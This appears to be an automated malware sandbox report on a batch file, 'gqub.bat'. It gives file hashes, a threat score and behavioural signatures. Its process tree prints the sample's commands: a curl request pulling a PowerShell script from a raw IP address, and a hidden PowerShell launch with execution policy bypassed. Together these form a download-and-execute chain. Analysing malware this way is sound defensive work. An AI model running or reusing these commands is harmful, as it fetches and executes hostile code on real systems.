Analysis
-
max time kernel
14s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
01-01-2025 07:57
Static task
static1
Behavioral task
behavioral1
Sample
gqub.bat
Resource
win7-20241010-en
windows7-x64
4 signatures
150 seconds
General
-
Target
gqub.bat
-
Size
3KB
-
MD5
bb445d197063475c8d78de4f0825753c
-
SHA1
158a8e3b278affe7c1185aad67683e4253cf53dd
-
SHA256
7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10
-
SHA512
173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2480 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2480 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 576 wrote to memory of 2348 576 cmd.exe 31 PID 576 wrote to memory of 2348 576 cmd.exe 31 PID 576 wrote to memory of 2348 576 cmd.exe 31 PID 576 wrote to memory of 2480 576 cmd.exe 32 PID 576 wrote to memory of 2480 576 cmd.exe 32 PID 576 wrote to memory of 2480 576 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\gqub.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\system32\cmd.execmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps12⤵PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480
-